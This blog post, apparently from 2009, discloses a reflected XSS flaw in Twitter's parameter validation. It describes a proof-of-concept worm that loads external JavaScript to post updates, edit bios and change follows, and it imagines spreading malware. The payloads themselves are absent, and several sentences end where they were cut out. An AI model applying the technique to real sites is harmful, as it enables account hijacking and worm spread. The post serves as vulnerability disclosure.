There's a subtle thrill to find yourself astonished when you think you've already seen 'em all.
Having worked for many years on web communities (especially in mobile environments), Twitter & social networks phenomena have no strong appeal on me; they just lack of novelty.
However I must admit that I'm fascinated from the security and privacy implications that comes with a "social" web application being used by millions of people.
In the last months, Twitter provided the security community with an amazing saga, being repeatedly plagued by almost any vulnerability known to mankind and pitilessly pointed as unable to protect its users' privacy: there has been so much hype about the "Twitter affair" that no worm, esoteric injection or other new oddity could add more spice on it.
But you should agree with me that this time Twitter has taken the cake.
I'll be short: Twitter fails to perform validation in any parameter on any URL!
Going into more detail, w Twitter raises a raw error page ranting that the given parameter is not accepted: of course no safe encoding is done on this error page...
The last example leads to this special voodoo recipe:
...and voilà, game is served. Disarming naivety.
Moreover, just two months ago, Twitter has been already notified about a RubyOnRails bug related to the same issue - querystring parameters validation - (http://brian.mastenbrook.net/display/36) and they patched the bug.
Evidently they missed that chance to entirely code-review their validation routines.
Ouch! Try it again, Twitter...
- And know we've got an XSS, what we can do?
- Having fun...
The limit is the sky: retrieve victims posts, CSRFing victims to post updates, alter victims' bio, modify followers, follow new people.
The only limit (imposed by HTTP syntax) is that no "=" sign can be used in the parameter name, as it is used to outline the name=value schema in querystrings; however, using a clever trick (Roberto Suggi Liverani rulez!) you can inject a <script src=...> tag and recall any external js you wish.
Proof of concept
The video below is a PoC of what was possible doing exploiting this vulnerability on Twitter.
The victim (testxss) logs in Twitter and click on a link: the link points to a TinyUrl shortcut that is remapped as follows:
Escaping the "=" sign in the parameter we were able to link an external js file: the script just leverages on a handful of jquery statements in order to:
This is just a PoC worm that we arranged in approx. 10 minutes.
Anyway, you can easily imagine some nastier scenarios:
Just think about using this vulnerability to spread all over Twitter some malware that exploits a browser bug: it's a bot-master dream!
That's exactly what I meant with "social network security implications": even the more "innocent" flaw (and XSS is not...) when exploited in a social network environment can become the sparkle for a viral infection.
Twitter, please take better care of your users security & privacy.
Users, webapps are not a secure storage. Don't relay on them for storing sensible informations.
Rosario Valotta, November 12nd 2009